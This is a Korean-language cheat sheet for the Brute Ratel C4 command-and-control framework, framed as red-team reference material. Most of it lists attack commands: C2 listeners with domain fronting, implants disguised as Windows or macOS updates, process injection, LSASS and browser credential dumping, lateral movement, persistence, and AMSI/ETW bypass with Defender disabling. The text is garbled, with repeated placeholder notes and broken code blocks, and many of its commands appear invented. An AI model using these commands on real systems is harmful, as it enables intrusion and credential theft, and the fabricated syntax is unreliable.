Brute Ratel C4 프레임워크 치트 시트
개요
Brute Ratel C4 (BRc4)는 레드팀 작전 및 적대적 시뮬레이션을 위해 설계된 상용 맞춤형 명령 및 제어(C2) 프레임워크입니다. 고급 회피 기능, 정교한 사후 익스플로이트 기능 및 전문적인 운영 보안을 제공합니다.
⚠️ 경고: 이는 유효한 라이선스가 필요한 상용 도구입니다. 이 도구는 승인된 침투 테스트 및 레드팀 연습용으로만 사용됩니다. 모든 환경에서 사용하기 전에 적절한 승인을 받았는지 확인하세요.
설치
라이선스 활성화
# Activate license (requires valid license key)
./brc4 --activate <license-key>
# Verify license status
./brc4 --license-info
# Update license
./brc4 --update-license
```[라이선스 활성화 관련 내용 필요]
### 서버 설정
```bash
# Start BRc4 server
./brc4 --server
# Start with custom configuration
./brc4 --server --config /path/to/config.json
# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```[서버 설정 관련 내용 필요]
### 클라이언트 연결
```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443
# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
```[클라이언트 연결 관련 내용 필요]
## 명령 참조
### 서버 관리
| 명령어 | 설명 |
|---------|-------------|
| `help` | 도움말 메뉴 표시 |
| `version` | 버전 정보 표시 |
| `listeners` | 활성 리스너 목록 |
| `badgers` | 연결된 배지(에이전트) 목록 |
| `operators` | 연결된 연산자 목록 |
| `exit` | BRc4 서버 종료 |[서버 관리 관련 내용 필요]
### 리스너 관리
| 명령어 | 설명 |
|---------|-------------|
| `listener http` | HTTP 리스너 생성 |
| `listener https` | HTTPS 리스너 생성 |
| `listener dns` | DNS 리스너 생성 |
| `listener tcp` | TCP 리스너 생성 |
| `listener smb` | SMB 리스너 생성 |
| `listener stop <id>` | 리스너 중지 |[리스너 관리 관련 내용 필요]
### 배저(에이전트) 관리
| 명령어 | 설명 |
|---------|-------------|
| `badger <id>` | badger와 상호작용하기 |
| `badger kill <id>` | 오소리 죽이기 |
| `badger sleep <time>` | 수면 간격 설정 |
| `badger jitter <percentage>` | 지터 비율 설정 |
| `badger proxy <proxy>` | Badger의 프록시 설정 |[배저 관리 관련 내용 필요]
## 리스너 구성
### HTTP/HTTPS 리스너
```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start
# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
```[HTTP/HTTPS 리스너 관련 내용 필요]
### DNS 리스너
```bash
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
```[DNS 리스너 관련 내용 필요]
### SMB 리스너
```bash
# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start
```[SMB 리스너 관련 내용 필요]
### TCP 리스너
```bash
# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start
```[TCP 리스너 관련 내용 필요]
## 배저 생성
### Windows 배저
```bash
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate
# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate
# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
```[Windows 배저 관련 내용 필요]
### Linux 배저
```bash
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate
# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
```[Linux 배저 관련 내용 필요]
### macOS 배저
```bash
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate
# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
```[macOS 배저 관련 내용 필요]
## 사후 익스플로이트 명령
### 시스템 정보
```bash
# Get system information
sysinfo
# Get current user
whoami
# Get privileges
getprivs
# Get environment variables
env
# Get network interfaces
ifconfig
```[시스템 정보 관련 내용 필요]
### 파일 작업
```bash
# List directory
ls /path/to/directory
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
# Execute file
execute /path/to/executable
# Delete file
rm /path/to/file
```[파일 작업 관련 내용 필요]
### 프로세스 관리
```bash
# List processes
ps
# Kill process
kill <pid>
# Migrate to process
migrate <pid>
# Inject into process
inject <pid> <payload>
# Create process
spawn <executable>
```[프로세스 관리 관련 내용 필요]
### 네트워크 작업
```bash
# Network connections
netstat
# ARP table
arp
# Routing table
route
# Port scan
portscan 192.168.1.0/24 80,443,3389
# Ping sweep
ping 192.168.1.0/24
```[네트워크 작업 관련 내용 필요]
## 고급 기능
### 변형 가능한 C2 프로필
```bash
# Load malleable profile
set malleable /path/to/profile.profile
# Custom HTTP profile
http-get \\\\{
set uri "/api/v1/status";
client \\\\{
header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
header "Accept" "application/json";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
```[변형 가능한 C2 프로필 관련 내용 필요]
### 프로세스 주입 기술
[프로세스 주입 기술 관련 내용 필요]```bash
# Classic DLL injection
inject-dll <pid> /path/to/dll.dll
# Process hollowing
hollow <target-process> <payload>
# Reflective DLL loading
reflective-dll /path/to/dll.dll
# Manual DLL mapping
map-dll <pid> /path/to/dll.dll
# Thread hijacking
hijack-thread <pid> <payload>
Credential Harvesting
# Dump LSASS
lsass-dump
# Mimikatz integration
mimikatz sekurlsa::logonpasswords
# SAM dump
sam-dump
# LSA secrets
lsa-secrets
# Cached credentials
cache-dump
# Browser credentials
browser-creds
Lateral Movement
# WMI execution
wmi-exec 192.168.1.10 "whoami"
# PSExec
psexec 192.168.1.10 "whoami"
# SMB execution
smb-exec 192.168.1.10 "whoami"
# DCOM execution
dcom-exec 192.168.1.10 "whoami"
# WinRM execution
winrm-exec 192.168.1.10 "whoami"
Persistence Mechanisms
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
# Startup folder
persist-startup "C:\temp\badger.exe"
Evasion Techniques
Anti-Analysis
# VM detection
vm-detect
# Sandbox evasion
sandbox-evasion
# Debugger detection
debugger-detect
# Sleep evasion
sleep-evasion 300
# User interaction check
user-interaction
AMSI/ETW Bypass
# AMSI bypass
amsi-bypass
# ETW bypass
etw-bypass
# Disable Windows Defender
disable-defender
# Unhook DLLs
unhook-dlls
# Patch AMSI
patch-amsi
Traffic Obfuscation
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com
# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"
Payload Obfuscation
# Encrypt payload
encrypt-payload aes256 <key>
# Obfuscate strings
obfuscate-strings
# Pack executable
pack-exe upx
# Sign executable
sign-exe /path/to/cert.pfx
# Polymorphic generation
polymorphic-gen
Operational Security
Communication Security
# Use encrypted channels
set encryption aes256
# Certificate pinning
set cert-pinning true
# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
# Jitter configuration
set jitter 20
set jitter-type random
Infrastructure Management
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443
# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"
# Failover configuration
set failover-servers "backup1.com,backup2.com"
Logging and Monitoring
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log
# Operator tracking
set operator-logging true
# Command auditing
set command-audit true
# Session recording
set session-recording true
Team Operations
Multi-Operator Support
# Add operator
operator add username password
# Set operator permissions
operator permissions username read,write,execute
# Operator sessions
operator sessions
# Kick operator
operator kick username
Collaboration Features
# Share badger session
share-session <badger-id> <operator>
# Session notes
note-add "Important finding"
note-list
note-delete <note-id>
# Team chat
chat "Message to team"
chat-history
Troubleshooting
Connection Issues
# Test listener
test-listener <listener-id>
# Check connectivity
test-connectivity <target>
# Verify certificates
verify-cert /path/to/cert.pem
# Debug mode
set debug true
Badger Issues
# Badger health check
health-check <badger-id>
# Reset badger
reset-badger <badger-id>
# Badger diagnostics
diagnostics <badger-id>
# Force reconnect
reconnect <badger-id>
Performance Optimization
# Optimize sleep intervals
set sleep-optimization true
# Bandwidth throttling
set bandwidth-limit 1024
# Connection pooling
set connection-pooling true
# Compression
set compression gzip
Configuration
Server Configuration
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}
Malleable Profile
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\\\{
set uri "/api/status";
client \\\\{
header "Accept" "application/json";
header "Accept-Language" "en-US,en;q=0.9";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}
Resources
이 치트 시트는 Brute Ratel C4 사용에 대한 포괄적인 참조를 제공합니다. 이는 적절한 라이선스가 필요한 상용 도구입니다. 어떤 환경에서든 이 도구를 사용하기 전에 항상 적절한 승인을 받았는지 확인하세요.